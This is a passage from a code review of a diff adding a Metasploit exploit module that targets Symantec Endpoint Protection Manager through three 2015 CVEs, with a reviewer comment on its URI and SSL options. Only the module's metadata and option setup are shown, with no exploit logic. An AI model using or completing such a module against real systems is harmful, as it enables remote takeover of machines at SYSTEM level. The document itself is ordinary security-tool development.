modules/exploits/windows/http/sepm_auth_bypass_rce.rb

```diff
@@ -0,0 +1,113 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Symantec Endpoint Protection Manager Auth Bypass and RCE",
+      'Description'    => %q{
+      This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
+      in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'bperry', #metasploit module
+          'Markus Wulftange' #discovery
+        ],
+      'References'     =>
+        [
+          ['CVE', '2015-1486'],
+          ['CVE', '2015-1487'],
+          ['CVE', '2015-1489'],
+          ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
+        ],
+      'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', {
+            'Arch' => ARCH_X86,
+            'Payload' => {
+              'DisableNops' => true
+            }
+          } ],
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Jul 31 2015',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptBool.new('SSL', [true, 'Use SSL', true]),
+          OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
```

Comment:
I am not sure if you are able to configure SEPM to use a relative URI that isn't what the default configuration provides. SSL should be set in the DefaultOptions.